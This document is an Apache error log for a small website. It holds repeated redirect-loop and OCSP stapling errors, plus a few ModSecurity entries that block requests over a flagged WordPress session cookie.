[Mon May 11 14:08:38.700299 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59534] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:39.906680 2026] [ssl:error] [pid 1319885:tid 1319889] (EAI 2)Name or service not known: [client 190.104.39.39:42015] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:39.906718 2026] [ssl:error] [pid 1319885:tid 1319889] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:40.325809 2026] [core:error] [pid 1319998:tid 1320015] [client 52.242.216.199:59575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:40.326299 2026] [core:error] [pid 1319998:tid 1320015] [client 52.242.216.199:59575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:42.488337 2026] [core:error] [pid 1319953:tid 1319960] [client 52.242.216.199:59622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:42.488375 2026] [core:error] [pid 1319953:tid 1319960] [client 52.242.216.199:59622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:43.197871 2026] [core:error] [pid 1319998:tid 1320022] [client 52.242.216.199:21640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:43.197896 2026] [core:error] [pid 1319998:tid 1320022] [client 52.242.216.199:21640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:44.670470 2026] [core:error] [pid 1320398:tid 1320421] [client 52.242.216.199:21733] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:44.670584 2026] [core:error] [pid 1320398:tid 1320421] [client 52.242.216.199:21733] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:45.487035 2026] [ssl:error] [pid 1319885:tid 1319912] (EAI 2)Name or service not known: [client 165.227.53.225:48954] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:45.487069 2026] [ssl:error] [pid 1319885:tid 1319912] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:46.233472 2026] [ssl:error] [pid 1319998:tid 1320010] (EAI 2)Name or service not known: [client 178.171.38.199:36761] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:46.233512 2026] [ssl:error] [pid 1319998:tid 1320010] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:46.413292 2026] [core:error] [pid 1320398:tid 1320418] [client 52.242.216.199:59591] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:46.413320 2026] [core:error] [pid 1320398:tid 1320418] [client 52.242.216.199:59591] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:49.079210 2026] [ssl:error] [pid 1319886:tid 1319937] (EAI 2)Name or service not known: [client 89.184.15.114:46599] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:49.079244 2026] [ssl:error] [pid 1319886:tid 1319937] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:49.505270 2026] [core:error] [pid 1319885:tid 1319925] [client 52.242.216.199:59620] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:49.505301 2026] [core:error] [pid 1319885:tid 1319925] [client 52.242.216.199:59620] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:52.313358 2026] [core:error] [pid 1320674:tid 1320706] [client 52.242.216.199:59599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:52.313468 2026] [core:error] [pid 1320674:tid 1320706] [client 52.242.216.199:59599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:56.562151 2026] [core:error] [pid 1319998:tid 1320012] [client 52.242.216.199:59551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:56.562211 2026] [core:error] [pid 1319998:tid 1320012] [client 52.242.216.199:59551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:57.550836 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:59645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:57.550967 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:59645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:00.340943 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:59563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:00.340984 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:59563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:02.667313 2026] [core:error] [pid 1320398:tid 1320400] [client 52.242.216.199:59535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:02.667348 2026] [core:error] [pid 1320398:tid 1320400] [client 52.242.216.199:59535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:04.163121 2026] [core:error] [pid 1319998:tid 1320002] [client 52.242.216.199:59592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:04.163169 2026] [core:error] [pid 1319998:tid 1320002] [client 52.242.216.199:59592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:04.991665 2026] [core:error] [pid 1320674:tid 1320707] [client 52.242.216.199:59637] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:04.991703 2026] [core:error] [pid 1320674:tid 1320707] [client 52.242.216.199:59637] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:06.313692 2026] [core:error] [pid 1319886:tid 1319933] [client 52.242.216.199:21700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:06.313738 2026] [core:error] [pid 1319886:tid 1319933] [client 52.242.216.199:21700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:07.144573 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:59533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:07.144605 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:59533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:08.563662 2026] [core:error] [pid 1319953:tid 1319975] [client 52.242.216.199:59647] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:08.563693 2026] [core:error] [pid 1319953:tid 1319975] [client 52.242.216.199:59647] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:09.456082 2026] [core:error] [pid 1319998:tid 1320018] [client 52.242.216.199:21724] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:09.456120 2026] [core:error] [pid 1319998:tid 1320018] [client 52.242.216.199:21724] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:10.704700 2026] [core:error] [pid 1319886:tid 1319917] [client 52.242.216.199:59641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:10.704735 2026] [core:error] [pid 1319886:tid 1319917] [client 52.242.216.199:59641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:11.628252 2026] [core:error] [pid 1319886:tid 1319931] [client 52.242.216.199:59529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:11.628284 2026] [core:error] [pid 1319886:tid 1319931] [client 52.242.216.199:59529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:12.556009 2026] [core:error] [pid 1319998:tid 1320014] [client 52.242.216.199:59557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:12.556044 2026] [core:error] [pid 1319998:tid 1320014] [client 52.242.216.199:59557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:13.536809 2026] [core:error] [pid 1319998:tid 1320009] [client 52.242.216.199:59546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:13.536840 2026] [core:error] [pid 1319998:tid 1320009] [client 52.242.216.199:59546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:15.849363 2026] [core:error] [pid 1319885:tid 1319927] [client 52.242.216.199:21639] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:15.849387 2026] [core:error] [pid 1319885:tid 1319927] [client 52.242.216.199:21639] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:16.880446 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:21706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:16.880480 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:21706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:17.565835 2026] [core:error] [pid 1320674:tid 1321055] [client 52.242.216.199:21740] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:17.565870 2026] [core:error] [pid 1320674:tid 1321055] [client 52.242.216.199:21740] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:18.912587 2026] [core:error] [pid 1319886:tid 1319897] [client 52.242.216.199:21716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:18.912618 2026] [core:error] [pid 1319886:tid 1319897] [client 52.242.216.199:21716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:20.422605 2026] [core:error] [pid 1319885:tid 1319900] [client 52.242.216.199:59562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:20.422642 2026] [core:error] [pid 1319885:tid 1319900] [client 52.242.216.199:59562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:23.080918 2026] [core:error] [pid 1319886:tid 1319917] [client 52.242.216.199:21698] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:23.080945 2026] [core:error] [pid 1319886:tid 1319917] [client 52.242.216.199:21698] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:24.863364 2026] [core:error] [pid 1319885:tid 1319935] [client 52.242.216.199:59577] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:24.863403 2026] [core:error] [pid 1319885:tid 1319935] [client 52.242.216.199:59577] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:25.584326 2026] [core:error] [pid 1319886:tid 1319919] [client 52.242.216.199:59536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:25.584362 2026] [core:error] [pid 1319886:tid 1319919] [client 52.242.216.199:59536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:27.071633 2026] [core:error] [pid 1320398:tid 1320407] [client 52.242.216.199:59543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:27.071671 2026] [core:error] [pid 1320398:tid 1320407] [client 52.242.216.199:59543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:29.014676 2026] [core:error] [pid 1319885:tid 1319920] [client 52.242.216.199:59612] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:29.014705 2026] [core:error] [pid 1319885:tid 1319920] [client 52.242.216.199:59612] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:30.322348 2026] [core:error] [pid 1319885:tid 1319898] [client 52.242.216.199:59520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:30.322569 2026] [core:error] [pid 1319885:tid 1319898] [client 52.242.216.199:59520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:32.452694 2026] [core:error] [pid 1319998:tid 1320006] [client 52.242.216.199:59564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:32.452725 2026] [core:error] [pid 1319998:tid 1320006] [client 52.242.216.199:59564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:33.858508 2026] [core:error] [pid 1320398:tid 1320413] [client 52.242.216.199:59582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:33.858545 2026] [core:error] [pid 1320398:tid 1320413] [client 52.242.216.199:59582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:35.058798 2026] [core:error] [pid 1319886:tid 1319921] [client 52.242.216.199:59540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:35.058833 2026] [core:error] [pid 1319886:tid 1319921] [client 52.242.216.199:59540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:37.469248 2026] [core:error] [pid 1319886:tid 1319901] [client 52.242.216.199:59621] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:37.469282 2026] [core:error] [pid 1319886:tid 1319901] [client 52.242.216.199:59621] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:38.200488 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:21699] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:38.200520 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:21699] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:40.140523 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59606] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:40.140559 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59606] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:42.393289 2026] [core:error] [pid 1319998:tid 1320015] [client 52.242.216.199:59526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:42.393314 2026] [core:error] [pid 1319998:tid 1320015] [client 52.242.216.199:59526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:44.069260 2026] [core:error] [pid 1319886:tid 1319909] [client 52.242.216.199:21748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:44.069302 2026] [core:error] [pid 1319886:tid 1319909] [client 52.242.216.199:21748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:46.153219 2026] [core:error] [pid 1319953:tid 1319974] [client 52.242.216.199:21659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:46.153269 2026] [core:error] [pid 1319953:tid 1319974] [client 52.242.216.199:21659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:46.828780 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHClchVQ3tCn0m9OpAZwAAAQ4"]
[Mon May 11 14:09:46.829231 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHClchVQ3tCn0m9OpAZwAAAQ4"]
[Mon May 11 14:09:46.843065 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHClchVQ3tCn0m9OpAZwAAAQ4"]
[Mon May 11 14:09:47.071327 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAaQAAAQ4"]
[Mon May 11 14:09:47.071547 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAaQAAAQ4"]
[Mon May 11 14:09:47.119476 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAaQAAAQ4"]
[Mon May 11 14:09:47.378252 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAawAAAQ4"]
[Mon May 11 14:09:47.378474 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAawAAAQ4"]
